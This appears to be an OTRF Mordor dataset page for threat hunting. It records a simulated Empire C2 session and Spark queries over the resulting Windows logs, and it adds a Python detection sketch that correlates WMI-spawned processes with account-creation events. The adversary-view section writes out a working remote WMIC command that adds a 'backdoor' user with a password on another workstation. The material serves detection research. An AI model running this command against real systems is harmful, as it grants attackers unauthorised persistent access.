Empire Remote WMIC Add User

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/14

Modification Date

2020/09/22

Tactics

['TA0002', 'TA0008']

Techniques

['T1047']

Tags

['WMI IWbemServices ExecMethod', 'User Backdoor']

Dataset Description

This dataset represents an adversary remotely executing code via WMI to add a backdoor user on the target system. It focuses on the use of the WMI Win32_Process class and its Create method to execute code remotely.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author    Name    Link

Simulation Plan

Environment     Tool Type    Module
Mordor shire    C2           shell

Adversary View

(Empire: agents) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent 6Z78CY25 checked in
[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5
agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KFL6CMNZ ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7584   5/0.0    2020-09-14 11:33:59  http            
YGBLW8EM ps 172.18.39.5     WORKSTATION5      *THESHIRE\wardog        powershell         8924   5/0.0    2020-09-14 11:40:53  http            
UBCKLYFA ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5412   5/0.0    2020-09-14 11:57:16  http            

6Z78CY25 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         9564   5/0.0    2020-09-14 12:02:08  http            

(Empire: agents) > interact 6Z78CY25
(Empire: 6Z78CY25) > 
(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create "net user /add backdoor pa$$w0rd1"
[*] Tasked 6Z78CY25 to run TASK_SHELL
[*] Agent 6Z78CY25 tasked with task ID 1
(Empire: 6Z78CY25) > 
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
  ProcessId = 7768;
  ReturnValue = 0;
};

..Command execution completed.

(Empire: 6Z78CY25) >

Explore Mordor Dataset

Initialize Analytics Engine

# The openhunt mordorutils helpers create a local Spark session and expose the dataset loader used below
from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

# Download the zipped JSON dataset, load it into a Spark DataFrame and register it as the temporary SQL view "mordorTable"
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

# Count events per host, channel and EventID to see which log sources (and which hosts) the dataset contains
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Security                                |5447   |1430 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |1426 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |1361 |
|WORKSTATION5.theshire.local|Security                                |5158   |1337 |
|WORKSTATION5.theshire.local|Security                                |5154   |1297 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |1139 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |1115 |
|WORKSTATION5.theshire.local|Security                                |4658   |534  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |276  |
|WORKSTATION5.theshire.local|Security                                |4656   |270  |
|WORKSTATION5.theshire.local|Security                                |4690   |264  |
|WORKSTATION5.theshire.local|Security                                |4663   |257  |
|WORKSTATION5.theshire.local|Security                                |4703   |120  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |113  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |108  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |11     |95   |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |90   |
|WORKSTATION5.theshire.local|Security                                |5156   |84   |
|WORKSTATION6.theshire.local|Security                                |4658   |67   |
|MORDORDC.theshire.local    |Security                                |5156   |54   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
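The natural next step after the overview query is to look for what the dataset description says happened on WORKSTATION6: a process launched through Win32_Process.Create and a local account created by it. On the target host a remote Win32_Process.Create call runs the new process as a child of the WMI provider host, WmiPrvSE.exe, so a Sysmon process-creation event (EventID 1) with that parent, followed shortly by a Security 4720 (user account created) on the same host, is the pairing a hunter would want. The block below is an added example, not code from the Mordor project or the OpenHunt notebook; it runs in plain Python over a few constructed JSON-lines events (not rows from the dataset) so it works without Spark or the download. The field names (Hostname, Channel, EventID, @timestamp, Image, ParentImage, CommandLine, TargetUserName) are assumed from Mordor's flattened event schema, and the 30-second correlation window is an arbitrary choice.

```python
import json
from datetime import datetime, timedelta

# Constructed sample events (not taken from the dataset), modelled on Mordor's
# flattened JSON schema. The command line's password is replaced by a placeholder.
SAMPLE_EVENTS = r"""
{"@timestamp": "2020-09-14T16:05:10.100Z", "Hostname": "WORKSTATION6.theshire.local", "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\net.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "net user /add backdoor <password>", "User": "THESHIRE\\pgustavo"}
{"@timestamp": "2020-09-14T16:05:10.300Z", "Hostname": "WORKSTATION6.theshire.local", "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\net1.exe", "ParentImage": "C:\\Windows\\System32\\net.exe", "CommandLine": "C:\\Windows\\system32\\net1 user /add backdoor <password>", "User": "THESHIRE\\pgustavo"}
{"@timestamp": "2020-09-14T16:05:10.900Z", "Hostname": "WORKSTATION6.theshire.local", "Channel": "Security", "EventID": 4720, "TargetUserName": "backdoor", "SubjectUserName": "pgustavo"}
{"@timestamp": "2020-09-14T16:20:00.000Z", "Hostname": "WORKSTATION5.theshire.local", "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\ipconfig.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "ipconfig /all", "User": "THESHIRE\\svc_inventory"}
{"@timestamp": "2020-09-14T17:00:00.000Z", "Hostname": "WORKSTATION5.theshire.local", "Channel": "Security", "EventID": 4720, "TargetUserName": "helpdesk01", "SubjectUserName": "wardog"}
"""

WMI_HOST_PROCESS = "wmiprvse.exe"  # provider host that parents Win32_Process.Create children


def parse_events(raw):
    """Parse JSON lines into dicts, attach a datetime under '_ts' and sort by time."""
    events = []
    for line in raw.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["_ts"] = datetime.strptime(ev["@timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ")
        events.append(ev)
    return sorted(events, key=lambda e: e["_ts"])


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def wmi_spawned_processes(events):
    """Sysmon EventID 1 records whose parent is WmiPrvSE.exe, i.e. processes
    started through WMI (locally or, as in this dataset, from a remote host)."""
    return [
        e for e in events
        if e["Channel"].endswith("Sysmon/Operational")
        and e["EventID"] == 1
        and basename(e.get("ParentImage", "")) == WMI_HOST_PROCESS
    ]


def correlate_user_creation(events, window=timedelta(seconds=30)):
    """One finding per WMI-spawned process. Severity is 'high' when a Security
    4720 (account created) follows on the same host within `window`, otherwise
    'medium' (WMI-launched process worth triage, but no account was created)."""
    creations = [e for e in events if e["Channel"] == "Security" and e["EventID"] == 4720]
    findings = []
    for proc in wmi_spawned_processes(events):
        created = None
        for acct in creations:
            delta = acct["_ts"] - proc["_ts"]
            if acct["Hostname"] == proc["Hostname"] and timedelta(0) <= delta <= window:
                created = acct["TargetUserName"]
                break
        findings.append({
            "host": proc["Hostname"],
            "timestamp": proc["@timestamp"],
            "image": basename(proc["Image"]),
            "command_line": proc.get("CommandLine", ""),
            "account_created": created,
            "severity": "high" if created else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in correlate_user_creation(parse_events(SAMPLE_EVENTS)):
        print(f"[{f['severity']:6}] {f['host']} {f['timestamp']} {f['image']} "
              f"-> account created: {f['account_created']}")
```

Against the constructed input the net.exe launch on WORKSTATION6 pairs with the 4720 for "backdoor" and is reported as high, while the ipconfig.exe launch on WORKSTATION5 stays medium because the only 4720 on that host is forty minutes later. net1.exe is not reported on its own: its parent is net.exe, so the WmiPrvSE.exe parent check already captures the chain at its root. The same two-step logic maps directly onto mordorTable as a self-join of Sysmon EventID 1 rows with Security 4720 rows on Hostname and a timestamp range.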